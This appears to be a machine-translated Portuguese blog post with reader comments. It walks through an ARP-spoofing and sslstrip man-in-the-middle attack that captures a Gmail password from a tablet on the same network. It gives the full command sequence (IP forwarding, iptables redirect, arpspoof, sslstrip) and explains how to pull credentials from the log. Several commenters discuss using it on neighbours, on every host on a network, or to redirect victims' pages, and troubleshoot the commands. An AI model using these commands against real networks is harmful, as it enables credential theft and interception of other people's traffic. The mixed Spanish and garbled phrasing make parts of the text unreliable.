Olá bloggers.
Por hoje tenho uma pequena amostra do quão perigoso pode ser estar conectado em qualquer rede sem a segurança daquelas que tantos de nós gostamos.
Por hoje, vou usar ArpSpoofing com Sslstrip para obter uma senha do Gmail. Para tornar o ambiente mais controlado, criei uma conta chamada "testarp@gmail.com".
E como não gosto muito dos preâmbulos, vamos ao que interessa.
AMBIENTE
Para este teste, o que temos é o seguinte:
1. Atacante: É meu desktop ou computador desktop que tem Debian Wheezy. De repositórios você pode instalar sslstrip y dsniff para conseguir ter harpspoofing
2. Vítima: A vítima é um Tablet Android que só quer ver seu e-mail pelo navegador.
3. O meio: O meio é meu Roteador Cisco DPC2425
ENDEREÇOS.
Endereço do invasor: 172.26.0.2
Endereço do roteador 172.26.0.1
Endereço da vítima: 172.26.0.8
ATAQUE:
A primeira coisa que faremos para este ataque é ativar o forward para que nosso computador possa encaminhar as informações para a vítima sem que ela perceba. (Caso contrário, seria um ataque de negação de serviços)
Para isso usaremos:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
Então, como vamos conseguir o que queremos?
Vamos primeiro inserir nosso e-mail no Tablet. Durante o login, vemos que milhares e milhares de coisas aparecem em nosso console.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
com Control + W, procuramos algo chamado POST SEGURO.
E veremos algo assim.
Entre aquela enorme linha que não pode ser vista está o e-mail e a senha da vítima.
Então, corremos para a direita até finalmente ver a luz no fim do túnel.
Em outra ocasião, veremos como podemos nos proteger um pouco desses ataques.
lembranças
Aproveito para dizer que quando o post foi publicado, os comandos não estavam corretos.
O comando iptables no final está faltando o 8080 que está em outra linha. E então os comandos arpspoof estavam todos na mesma linha. Cada comando estando em uma linha diferente.
Espero que o editor veja e possa consertar.
Saudações.
Eu fiz as correções que você mencionou, tudo bem?
Se você for inserir código em uma entrada preferencial, use a visualização HTML e verifique se o artigo está correto antes de enviá-lo para pendente. Obrigado.
É assustador saber que aqueles de nós que não temos conhecimento são tão vulneráveis. Informação muito boa mesmo quando entendo pouco do assunto percebo a importância. Obrigado!
lembranças
Mas isso só funciona se o invasor e a vítima estiverem na mesma rede. Em qualquer caso, parece-me que se (estando na mesma rede) você se conectar usando HTTPS, isso não acontece porque os dados são criptografados ANTES de deixar sua máquina. Se conectar por HTTP (sem S) acho que mesmo olhando o cabo de rede você vê as chaves.
Não é certo. Estou hackeando uma senha do gmail e se você notar que o gmail usa https. Então? A questão é que, embora o https seja seguro, ele depende do http. Portanto, não é tão seguro.
Não confesso tanto sobre um https que o S não é para Superman é para "seguro"
funciona com ou sem https, tentei com uma distro linux mais especializada e funciona sem problemas
Você pode usá-lo precisamente para ensinar uma lição para aqueles que roubam seu wi-fi. 😀
É mais ou menos parecido com o que diziam há muito tempo no blog de Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, ótimo o que faz! / E eles falam para o meu paranóico toda vez que eu uso a VPN quando eles vão checar a conta bancária ...). Aliás, você tem que ver o quão cínico as pessoas são nos comentários ... se no fim é roubo ...
Agora precisamos fazer um tutorial sobre como criar e oferecer seu próprio serviço VPN.
A história que você linkou é muito interessante, até parece digna de um livro de romance, e isso me faz lembrar quando usava a internet dos meus vizinhos e embora diga que conheço o assunto, acho que nunca consegui ver as verdadeiras dimensões do perigo que poderia por último, felizmente para mim, eles só mudaram a senha para WPA2 e foi aí que minha história com o ISP começou haha
É por isso que o título diz Sslstrip em ação.
Funciona, desde que o atacante esteja no meio
Qual onda você trabalha no prisma? -.-
n.
Do que está à espera para enviar o seu pedido XD
lembranças
bom post
Interessante, vou fazer um teste educativo depois ... Talvez até pudesse tirar a senha do WiFi e me divertir um pouco 😛
Por acaso, você pode fazer algo semelhante para enviar páginas diferentes daquelas que o destino solicitou? Por exemplo, eles querem abrir o Facebook e eu os redireciono para o Google? 😛
Sim. Mas é tudo um rolo muito diferente.
Talvez eu poste mais tarde.
post muito bom, esses tópicos são muito educativos, agora precisamos ser capazes de neutralizar esse ataque, já que alguns (como eu) se conectam a redes públicas (a universidade por exemplo) seria útil evitá-lo.
Saudações!
Não funcionou para mim 🙁
Algo me falha aqui, além do fato de que as conexões https são criptografadas através de um certificado de servidor (uma vez que você tem o certificado em sua máquina, seu navegador se encarrega da criptografia) com iptables você redireciona a porta 80 (http), não 443 que é https
Também achei. A questão é que, embora https seja "seguro", infelizmente depende do http. Assim, o sslstrip tira vantagem disso, faz o navegador acreditar que está usando credenciais https, mas não está.
puta merda! mas o navegador deve ver um aviso como "este certificado vem de um site suspeito ou algo parecido" ... Com certeza terei que fazer testes XD
Não, absolutamente nada sai.
Finalmente funcionou para mim
Estou conectado a uma rede WEP com senha e mesmo assim me mostrou a senha diretamente.
Uma consulta. Você pode fazer o mesmo procedimento, mas para todos os computadores que estão conectados na rede, em vez de ter uma única vítima?
Sim, pode. Mas não fiz experimentos. Experimente você mesmo e diga-nos como foi.
A única coisa que consigo com isso é que a máquina da vítima fica offline, mas o sslstrip não me mostra nada: /
Você deve desativar o firewall por um momento. Ou pelo menos habilite conexões de entrada.
Probe e eu só conseguíamos ver o nome de usuário e senha da página do facebook, no gmail não encontrei nenhum resultado no log, também só precisava de uma linha de arpspoof «arpspoof -i -t«. Por outro lado, a máquina da vítima não conseguiu abrir algumas páginas. Vou continuar investigando, é muito interessante. Uma ajuda para quem usa o Manjaro, os pacotes a instalar são: dsniff (aqui é arpspoff), twisted e python2-pyopenssl. Sslstrip pode ser baixado aqui: http://www.thoughtcrime.org/software/sslstrip/
Para executá-lo $ python2 sslstrip.py
Saudações.
Não saiu, mas a linha arpspoof é: #arpspoof -i int -t ip-Victim ip-router
olha eu faço exatamente o que você diz:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
O problema é que a vítima, que é outro pc que tenho aqui no meu quarto, fica sem conexão a ponto de eu ter que reiniciar o roteador, o que posso fazer, me ajudar.
Outra coisa, estou trabalhando com uma máquina virtual, e quando executo o comando iwconfig não aparece wlan0, nem quando executo ifconfig, porém, se tenho internet na minha máquina virtual, que com interface eth0.